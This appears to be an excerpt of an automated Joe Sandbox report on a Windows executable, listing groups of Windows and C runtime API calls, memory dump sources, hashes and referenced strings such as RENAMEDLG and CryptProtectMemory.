                                                                                                              • SetLastError.KERNEL32(00000000,?,00460C0B,0045E662), ref: 00460C9B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                              • String ID:
                                                                                                              • API String ID: 3852720340-0
                                                                                                              • Opcode ID: f45e87bee31ed8ff25e251e92beb4a8c0cccffa7ccefd42e8e06ee478bd359f1
                                                                                                              • Instruction ID: 4a592363c959fe0277e10f143edecd472ec8d30154cb2b5bf1f5385362e881d5
                                                                                                              • Opcode Fuzzy Hash: f45e87bee31ed8ff25e251e92beb4a8c0cccffa7ccefd42e8e06ee478bd359f1
                                                                                                              • Instruction Fuzzy Hash: 8B01D4322497115EE7292AB5BC8592B2B48EB413BAF64033FF518401F1FE6A8C51518F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                              • API String ID: 0-1718035505
                                                                                                              • Opcode ID: df22085c377c9bb1f852fdc6a9ceb28f44b909c3657d5604b26d7ba179106901
                                                                                                              • Instruction ID: 577ca485df3d2758fef8de49022d62e32d6f47cb82c728387ccef290e6ee954b
                                                                                                              • Opcode Fuzzy Hash: df22085c377c9bb1f852fdc6a9ceb28f44b909c3657d5604b26d7ba179106901
                                                                                                              • Instruction Fuzzy Hash: 2F01D6716823219F4F303E756CC46A723C4AA127A3321543BDC14D3351D719C88DA6EE
                                                                                                              APIs
                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 004500AE
                                                                                                                • Part of subcall function 0044A8E0: GetVersionExW.KERNEL32(?), ref: 0044A905
                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004500D0
                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 004500EA
                                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 004500FB
                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045010B
                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00450117
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                                              • String ID:
                                                                                                              • API String ID: 2092733347-0
                                                                                                              • Opcode ID: 0cbba00e9c8991bcd3c3512f922cd634b45501cf6bf8aa4a9d68b15ac282d3af
                                                                                                              • Instruction ID: 530afd9a345a57401b20f19f1c2ea1dd56b1d213b1245df2ada994646277d284
                                                                                                              • Opcode Fuzzy Hash: 0cbba00e9c8991bcd3c3512f922cd634b45501cf6bf8aa4a9d68b15ac282d3af
                                                                                                              • Instruction Fuzzy Hash: 1C31D47A1083459BC700DFA5D9809ABB7F8FF98704F04492EF999D3211E734E549CB6A
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _memcmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 2931989736-0
                                                                                                              • Opcode ID: b27312745e4a08a35d98510476cc57429a2c8fcc4712fd1bf522df68fe563c5d
                                                                                                              • Instruction ID: 316d37488092766985381a948ba18202c2f188a41b7e593eae1239ad0bd050a2
                                                                                                              • Opcode Fuzzy Hash: b27312745e4a08a35d98510476cc57429a2c8fcc4712fd1bf522df68fe563c5d
                                                                                                              • Instruction Fuzzy Hash: 02213BB160050AABD7085A11CC81F777B9CAF50759F14816FFC08A6203FE78DD0E469A
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 0044FB07
                                                                                                              • EnterCriticalSection.KERNEL32(00481E74,00000000,?,?,0044A7C2,?,0044C74B,?,00000000,?,00000001,?,?,?,00453AFF,?), ref: 0044FB15
                                                                                                              • new.LIBCMT ref: 0044FB35
                                                                                                              • new.LIBCMT ref: 0044FB6B
                                                                                                              • LeaveCriticalSection.KERNEL32(00481E74,?,0044A7C2,?,0044C74B,?,00000000,?,00000001,?,?,?,00453AFF,?,00008000,?), ref: 0044FB8B
                                                                                                              • LeaveCriticalSection.KERNEL32(00481E74,?,0044A7C2,?,0044C74B,?,00000000,?,00000001,?,?,?,00453AFF,?,00008000,?), ref: 0044FB96
                                                                                                                • Part of subcall function 0044F930: InitializeCriticalSection.KERNEL32(000001A0,00481E74,00000000,?,?,0044FB88,00000020,?,0044A7C2,?,0044C74B,?,00000000,?,00000001,?), ref: 0044F969
                                                                                                                • Part of subcall function 0044F930: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0044A7C2,?,0044C74B,?,00000000,?,00000001,?,?,?,00453AFF), ref: 0044F973
                                                                                                                • Part of subcall function 0044F930: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0044A7C2,?,0044C74B,?,00000000,?,00000001,?,?,?,00453AFF), ref: 0044F983
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$CreateLeave$EnterEventH_prologInitializeSemaphore
                                                                                                              • String ID:
                                                                                                              • API String ID: 3919453512-0
                                                                                                              • Opcode ID: b42fc06b5265d2f1e5db1fa5acfb2013bbf4f32b5d0df298034ab29cbf5bcf23
                                                                                                              • Instruction ID: 3967ac869ca569edffcac45420eccf7dfc2b7fccdde4fe2e40825c57ada342de
                                                                                                              • Opcode Fuzzy Hash: b42fc06b5265d2f1e5db1fa5acfb2013bbf4f32b5d0df298034ab29cbf5bcf23
                                                                                                              • Instruction Fuzzy Hash: 2B11A030A01251EBE7049B68EC55ABE76B8EB89714F00453FFC09D73A1DB78980ADB5D
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(?,0047CBE8,00462674,0047CBE8,?,?,00462213,?,?,0047CBE8), ref: 00466323
                                                                                                              • _free.LIBCMT ref: 00466356
                                                                                                              • _free.LIBCMT ref: 0046637E
                                                                                                              • SetLastError.KERNEL32(00000000,?,0047CBE8), ref: 0046638B
                                                                                                              • SetLastError.KERNEL32(00000000,?,0047CBE8), ref: 00466397
                                                                                                              • _abort.LIBCMT ref: 0046639D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                              • String ID:
                                                                                                              • API String ID: 3160817290-0
                                                                                                              • Opcode ID: fdff1bae129b134ddbdb4209bf20ff7c7b40972e5ed020b0b961980943ebccee
                                                                                                              • Instruction ID: a222490de34fff7ba7ae9d536861fcd99234c49597fff3b6687ac60f400b6402
                                                                                                              • Opcode Fuzzy Hash: fdff1bae129b134ddbdb4209bf20ff7c7b40972e5ed020b0b961980943ebccee
                                                                                                              • Instruction Fuzzy Hash: 46F0F9B2605B0066C7112B266C0AB1B162A9BC1779F26022BF91892391FF3D8C81415F
                                                                                                              APIs
                                                                                                              • CharUpperW.USER32(?,?,?,?,00001000), ref: 0045A92C
                                                                                                              • CharUpperW.USER32(?,?,?,?,?,00001000), ref: 0045A953
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharUpper
                                                                                                              • String ID: *aH$-
                                                                                                              • API String ID: 9403516-74920309
                                                                                                              • Opcode ID: 62a08811f8226f77a474ce1ae2da6f1099fc6ba489f36b5157e710595c56a0e9
                                                                                                              • Instruction ID: 10845832028b2add77be0b14c5657b0d8ce1be771ed511395cf7b3cba39c79d7
                                                                                                              • Opcode Fuzzy Hash: 62a08811f8226f77a474ce1ae2da6f1099fc6ba489f36b5157e710595c56a0e9
                                                                                                              • Instruction Fuzzy Hash: 1821E9B140422665D311EA69940CB7BA698E745316F054E1BFC84C1A43D67CD8ACD36F
                                                                                                              APIs
                                                                                                                • Part of subcall function 004412E7: GetDlgItem.USER32(00000000,00003021), ref: 0044132B
                                                                                                                • Part of subcall function 004412E7: SetWindowTextW.USER32(00000000,004702E4), ref: 00441341
                                                                                                              • EndDialog.USER32(?,00000001), ref: 0045B86B
                                                                                                              • GetDlgItemTextW.USER32(?,00000066,00000800), ref: 0045B881
                                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0045B89B
                                                                                                              • SetDlgItemTextW.USER32(?,00000066), ref: 0045B8A6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemText$DialogWindow
                                                                                                              • String ID: RENAMEDLG
                                                                                                              • API String ID: 445417207-3299779563
                                                                                                              • Opcode ID: 3e4a52ecb82409df004afdef2cf6b9134ed8396840a5fc66d62024d7a9d4a16f
                                                                                                              • Instruction ID: 79c8ce89eb033668dac9c387f48d15da7f2f239f435e8cda20524f165f74c613
                                                                                                              • Opcode Fuzzy Hash: 3e4a52ecb82409df004afdef2cf6b9134ed8396840a5fc66d62024d7a9d4a16f
                                                                                                              • Instruction Fuzzy Hash: BA01F93294421177E1119E695D44F3B7B6CDB96B52F10083BFA04B21A1C35A5819D7BF
                                                                                                              APIs
                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00464A90,?,?,00464A30,?,00477F68,0000000C,00464B87,?,00000002), ref: 00464AFF
                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00464B12
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00464A90,?,?,00464A30,?,00477F68,0000000C,00464B87,?,00000002,00000000), ref: 00464B35
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                              • Opcode ID: 92fce294e6f8d5eda17760a970b02d54a13ab31f3ceda07b5661f6f460ca85bf
                                                                                                              • Instruction ID: 57cd15d6379fc50b983552cdc5bd907c06dfe6a76f65c3a4d5a7d45e30ddcd09
                                                                                                              • Opcode Fuzzy Hash: 92fce294e6f8d5eda17760a970b02d54a13ab31f3ceda07b5661f6f460ca85bf
                                                                                                              • Instruction Fuzzy Hash: E6F0A430901208FFCB155FA0DC09BAE7FB4EF44712F104075F809A2250DB789D80CA99
                                                                                                              APIs
                                                                                                                • Part of subcall function 0044F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0044F324
                                                                                                                • Part of subcall function 0044F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0044DEC8,Crypt32.dll,?,0044DF4A,?,0044DF2E,?,?,?,?), ref: 0044F346
                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0044DED4
                                                                                                              • GetProcAddress.KERNEL32(00481E58,CryptUnprotectMemory), ref: 0044DEE4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                              • API String ID: 2141747552-1753850145
                                                                                                              • Opcode ID: 6b420bec89191d1358b8dc5c736991d2fd3e9009bdec8bfca1b37743a844423f
                                                                                                              • Instruction ID: 3dc4100fdc3ec64adf3ccaba9aae321f6dcf39be6bb5a228ecd357e87d41c3b4
                                                                                                              • Opcode Fuzzy Hash: 6b420bec89191d1358b8dc5c736991d2fd3e9009bdec8bfca1b37743a844423f
                                                                                                              • Instruction Fuzzy Hash: 69E04FB0902B43EEEB505B75A808B46FB947B60724F20C52BF01CD2680DBB8D0A48B58
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID:
                                                                                                              • API String ID: 269201875-0
                                                                                                              • Opcode ID: 5cb9d0e5c34b07f47721c4ca584fa634704689790e75ff1627333ed8bb1d123f
                                                                                                              • Instruction ID: 93916714a32fb94ba62f5883977dad081dc331e40d101f85b8a47691dab62e13
                                                                                                              • Opcode Fuzzy Hash: 5cb9d0e5c34b07f47721c4ca584fa634704689790e75ff1627333ed8bb1d123f
                                                                                                              • Instruction Fuzzy Hash: 3741D372A006009FCB20DF79C881A5EB3F1EF84714F1545AEE905EB381EB75AD41CB86
                                                                                                              APIs
                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 004689B8
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004689DB
                                                                                                                • Part of subcall function 004659FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,004623AA,?,0000015D,?,?,?,?,00462F29,000000FF,00000000,?,?), ref: 00465A2E
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00468A01
                                                                                                              • _free.LIBCMT ref: 00468A14
                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00468A23
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 336800556-0
                                                                                                              • Opcode ID: 12419403a75dd25069a2365508425de30f7a64a650bc88d3889093e65f8dc717
                                                                                                              • Instruction ID: e58c98d9b0005615d1a391b08cea1bbb47aeefaaa01e22666e4bc4e1cca77fda
                                                                                                              • Opcode Fuzzy Hash: 12419403a75dd25069a2365508425de30f7a64a650bc88d3889093e65f8dc717
                                                                                                              • Instruction Fuzzy Hash: 7F0188B2602615BB272156F66D4CC7B6B6DDAC6F60315023FFD44D3201FE698C0181BA
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(?,?,?,00465E43,00465ADF,?,0046634D,00000001,00000364,?,00462213,?,?,0047CBE8), ref: 004663A8
                                                                                                              • _free.LIBCMT ref: 004663DD
                                                                                                              • _free.LIBCMT ref: 00466404
                                                                                                              • SetLastError.KERNEL32(00000000,?,0047CBE8), ref: 00466411
                                                                                                              • SetLastError.KERNEL32(00000000,?,0047CBE8), ref: 0046641A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3170660625-0
                                                                                                              • Opcode ID: 897bed72a11e35b02d98fe3ee678cdc91d0c8a5b1bf25f58cade1a335d3e9c27
                                                                                                              • Instruction ID: 24f4b17b38c24234a12da75246d515815775e95b23b090a5fb90216089950cd6
                                                                                                              • Opcode Fuzzy Hash: 897bed72a11e35b02d98fe3ee678cdc91d0c8a5b1bf25f58cade1a335d3e9c27
                                                                                                              • Instruction Fuzzy Hash: D90144B224170067870227266C89A2B262CDBC1379B32013FF82892392FF7D8C5141AF
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 00469282
                                                                                                                • Part of subcall function 004659C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00469301,?,00000000,?,00000000,?,00469328,?,00000007,?,?,00469725,?), ref: 004659D8
                                                                                                                • Part of subcall function 004659C2: GetLastError.KERNEL32(?,?,00469301,?,00000000,?,00000000,?,00469328,?,00000007,?,?,00469725,?,?), ref: 004659EA
                                                                                                              • _free.LIBCMT ref: 00469294
                                                                                                              • _free.LIBCMT ref: 004692A6
                                                                                                              • _free.LIBCMT ref: 004692B8
                                                                                                              • _free.LIBCMT ref: 004692CA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: c89f56c6b8bedd258d3fc352cf0df7c2467c95780f2949eab1493af90d913d3d
                                                                                                              • Instruction ID: e9f1930591f810bfda1e6e978ae7d2938ed656aee1e08e5c3c34f7616285f215
                                                                                                              • Opcode Fuzzy Hash: c89f56c6b8bedd258d3fc352cf0df7c2467c95780f2949eab1493af90d913d3d
                                                                                                              • Instruction Fuzzy Hash: D6F03CB2605600AB8A20EB69E982C1B73EDAA40720B594C4BF048D7651E678FC84865F
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 0046555D
                                                                                                                • Part of subcall function 004659C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00469301,?,00000000,?,00000000,?,00469328,?,00000007,?,?,00469725,?), ref: 004659D8
                                                                                                                • Part of subcall function 004659C2: GetLastError.KERNEL32(?,?,00469301,?,00000000,?,00000000,?,00469328,?,00000007,?,?,00469725,?,?), ref: 004659EA
                                                                                                              • _free.LIBCMT ref: 0046556F
                                                                                                              • _free.LIBCMT ref: 00465582
                                                                                                              • _free.LIBCMT ref: 00465593
                                                                                                              • _free.LIBCMT ref: 004655A4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 0f117871e7c7c3fd80da7f17210970f7274e20429bb2dc39787485c5a510c1a7
                                                                                                              • Instruction ID: 10b61c5e25324d904f385b5e4c0d0f32f4c50246517944dfecee0aebd48189f0
                                                                                                              • Opcode Fuzzy Hash: 0f117871e7c7c3fd80da7f17210970f7274e20429bb2dc39787485c5a510c1a7
                                                                                                              • Instruction Fuzzy Hash: 02F01DF16116109BCB21BF29BD014093BB0FB24B60745113BF45452275EB3808619ACF
                                                                                                              APIs
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 00464C1A
